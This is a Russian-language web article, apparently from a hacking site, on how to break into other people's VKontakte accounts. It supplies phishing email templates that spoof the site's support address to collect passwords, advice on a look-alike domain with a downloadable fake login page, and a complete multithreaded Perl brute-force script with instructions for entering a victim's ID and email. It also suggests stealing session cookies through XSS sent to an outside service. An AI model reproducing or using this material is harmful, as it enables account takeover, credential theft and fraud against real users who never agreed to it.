Введение
В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.
Очень много людей просят взломать страницу, из своих личных побуждений.
Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет
НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что
смиритесь.
Для тех, кто понимает, о чём я, продолжаем.ID это как уник. код юзера, то есть, например серийный номер машины.
Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892
ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.
Некоторые способы взлома:
1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
вам необходимо на него ответить в такой форме:
EM: Ваш email в vkontakte.ru.
PA: Ваш пароль в vkontakte.ru.
Пример:
EM: pavel_durov@mail.ru
PA: 123456
Чтоб не было путаницы, в теме письма укажите тему "Обновление".
Приносим извинения за неудобства.".
Или типа этого, импровизируйте.2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда.
vkontakte.zip [4.27 Kb] (cкачиваний: 11534)3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.
Приносим извинения за неудобства.".
Или типа этого, импровизируйте.
4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.
Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
--------------------------------------------------------------------------------
Цитата:
--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
--------------------------------------------------------------------------------
Как запустить скрипт:
Цитата:
--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.
Vkontakte bruteforce ©serber
vkontakte_bruteforce.rar [79.6 Kb] (cкачиваний: 20674) или
vkontakte.exe [111.5 Kb] (cкачиваний: 18709)Словари
тут.
5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.
Ну, вот мы рассмотрели
5 способов как можно взломать страницу вконтакте.
Если до сих пор не поняли,
не судьба :) Лучше
мирно сидите там дальше вконтакте.
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо зайти на сайт под своим именем.
вконтакте взлом
как сохранить форматировани...
как посмотреть скрытую стра...
